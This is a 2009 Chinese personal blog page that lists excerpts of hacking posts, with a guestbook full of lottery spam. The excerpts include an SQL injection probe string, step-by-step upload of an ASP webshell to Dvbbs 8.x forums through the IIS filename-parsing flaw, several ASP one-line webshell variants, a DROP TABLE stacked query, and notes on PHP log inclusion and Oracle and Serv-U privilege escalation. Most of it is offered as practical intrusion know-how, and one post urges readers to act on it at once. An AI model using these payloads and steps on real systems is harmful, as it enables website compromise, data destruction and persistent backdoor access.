默默许愿's Blog
百度空间 | 百度首页 
 
个人档案
 
mmxyblog

上次登录:
27天前
加为好友
 
   
 
日历
 
     
 
文章分类
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
     
 
最新照片
 
   
 
背景音乐
 
 
留言板
 

呵呵,来我空间看看吧,朋友,你空间不错,呵呵
 

我刚开通百度空间,能和你交个朋友吗?想找个人教玩空间
 

还记得我么?有时间也来看看我,和大家一起探讨下男人女人 谁更好色的问题,呵呵
 

财神吧两元两角购彩平台,为您提供精准的购彩计划。营业期间一直有口皆碑与雄厚的经济...
 

彩票是智者的游戏,不是愚者的赌局。快来我们QQ群看看(33630412) 让你玩转彩市
 
     
 
订阅我的空间
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     
 
 
文章列表
 
2009-10-11 12:13
and exists(select * from admin where 1=(Select (case when host_name()
=@@servername then 1 else 0 end)))
加在注入点后面,如果返回正常说明web和数据库是同一服务器,如果不正常责说明是分离的.
注意admin是数据库存在的一个表,自己找吧.
 
2009-09-30 01:09

利用的还是IIS的文件名解析漏洞.

影响版本:
Powered By Dvbbs Version 8.2.0
Powered By Dvbbs Version 8.1.0
Powered By Dvbbs Version 8.0.0

注册用户-我的主页-个人空间管理

userspace.asp?sid=0&act=modifyset

然后编辑CSS风格-文件管理

bbs/Dv_plus/myspace/script/filemange.asp

上传 hacknote.asp;hacknote.jpg

接下来知道了吧

赶快行动吧

 
2009-09-24 21:23
如今,针对WEB应用的安全威胁越来越多。这些安全威胁有些是利用WEB站点所在的服务器系统漏洞,有些是利用WEB应用程序本身的漏洞,有些是利用数据库的漏洞来进行攻击的。因此,使用一些方法和工具,对整个WEB站点进行详细的安全评估,找出目前WEB服务器系统、WEB应用程序及数据库中存在的弱点,才有可能将安全威胁抹杀在最初状态。

  在对WEB

 
2009-09-24 21:22
作者:浅凝

很多时候对于开放1521端口的Windows下Oracle数据库服务器,因为大多存在默认低权限用户dbsnmp,或者人品爆发高权限的用户 (sysdba)是默认密码或弱口令,由此可以通过Oracle的一些提权漏洞获取Oracle的最高权限,直至得到系统的SYSTEM权限。

 
2009-09-24 21:20

作者:lcx

'今天搞了个网站,注入点过滤得很变态,工具都不能跑,于是写了这个东东:

set arg=wscript.arguments
If (LCase(Right(Wscript.fullname,11))="Wscript.exe") Then
Wscript.Quit
End

 
2009-09-21 15:06
Mysql是在LAMP和WAMP上最流行的数据库服务器软件套件。DBMS连接默认是不支持堆查询。这就使得一些技术去实施远程代码执行漏
下面的就是再SQL注入攻击中的一个堆查询的例子
SELECT name FROM record WHERE id = 1; DROP table record; DROP table address--
2)把本地文件的内容进行对等的16进制的转换。
3)切分16进制的字符串到1024字符长的大块
4)INSERT 第一个大块进支持表的字段里面
5)UPDATE其他的大的块添加到这个
 
2009-09-21 15:05

关于php包含Apache日志的利用,其实也就是利用提交的网址里有php语句,然后再被Apache服务器的日志记录,然后php再去包含执行,从而包含了去执行。当然,这种办法最大的弊端是Apache日志肯定会过大,回应的时候当然会超时什么的,所以也是受条件限制的。全当一种研究算了。下面是我的测试过程,我觉得很有意思,你也看看。
比如说,在一个php存在包含漏洞就像这样,存在一句php包含漏洞的语句


以下是引用片段:
<? include($zizzy); ?>   //包含变量$zizzy

 
2009-09-21 15:05

看cnbeta发现su出8这个版本了。

想想以前写过一个7的本地提权。

不知道8有什么安全方面的更改。

下载来研究下,发现居然还是可以提权的,只是su7的那个不能直接用,稍微修改了下执行的流程。

Su8的管理平台是http的,继承了su7的方式。
抓包,分析,发现了以下路程是可以利用的。
1, 管理员从管理控制

 
2009-09-21 15:04
来源:van
相信大家对eWeb并不陌生

大家在搞站的可否发现有的uploadfiles目录里面传上去的大马或小马是500错误

入侵了这么久,发现在此情况下,上传一句话,可以连接!

eval的一句话有时候会失败

execute的一句话基本上都是成功的!

By:van

附:(多种写一句话的方法)

ASP一句话
1.<%eval request("YouPass")%>
2. <%executerequest("YouPass")%>
3. <%execute(request("YouPass"))
 
2009-09-21 15:04
asp最脆弱的不是技术,而是防范黑客攻击。而无论怎样攻击,通过QueryString和form,只要这两处防范好了,问题就解决了

  下面是我自家独创的一些代码,供大家参考

  一.防通过querystring的sql攻击

  一般sql能够攻击的页面通常是在参数为数字的页面

  1.首先我们做一个警告

 
     
 
最近访客
 
 

new2old

congpeiyu

似水年华0106

我很懒╮先生

cnfishice

za88488848

依然梅西

ipoemcsw
     


©2009 Baidu